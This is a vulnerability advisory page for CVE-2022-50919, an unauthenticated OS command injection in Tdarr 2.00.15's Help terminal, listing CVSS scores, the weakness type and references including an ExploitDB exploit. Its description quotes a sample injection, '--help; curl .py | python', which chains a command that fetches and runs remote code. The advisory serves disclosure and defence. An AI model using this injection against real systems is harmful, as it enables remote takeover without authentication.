CVE-2022-50919 | THREATINT

Description

Tdarr 2.00.15 contains an unauthenticated remote code execution vulnerability in its Help terminal that allows attackers to inject and chain arbitrary commands. Attackers can exploit the lack of input filtering by chaining commands like `--help; curl .py | python` to execute remote code without authentication.

PUBLISHED Reserved 2026-01-11 | Published 2026-01-13 | Updated 2026-01-14 | Assigner VulnCheck

CRITICAL: 9.3CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

CRITICAL: 9.8CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Problem types

Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')

Product status

2.00.15

affected

Credits

Sam Smith finder

References

www.exploit-db.com/exploits/50822 (ExploitDB-50822) exploit

tdarr.io (Official Vendor Homepage) product

www.vulncheck.com/advisories/tdarr-command-injection (VulnCheck Advisory: Tdarr 2.00.15 - Command Injection) third-party-advisory

cve.org (CVE-2022-50919)

nvd.nist.gov (CVE-2022-50919)

Download JSON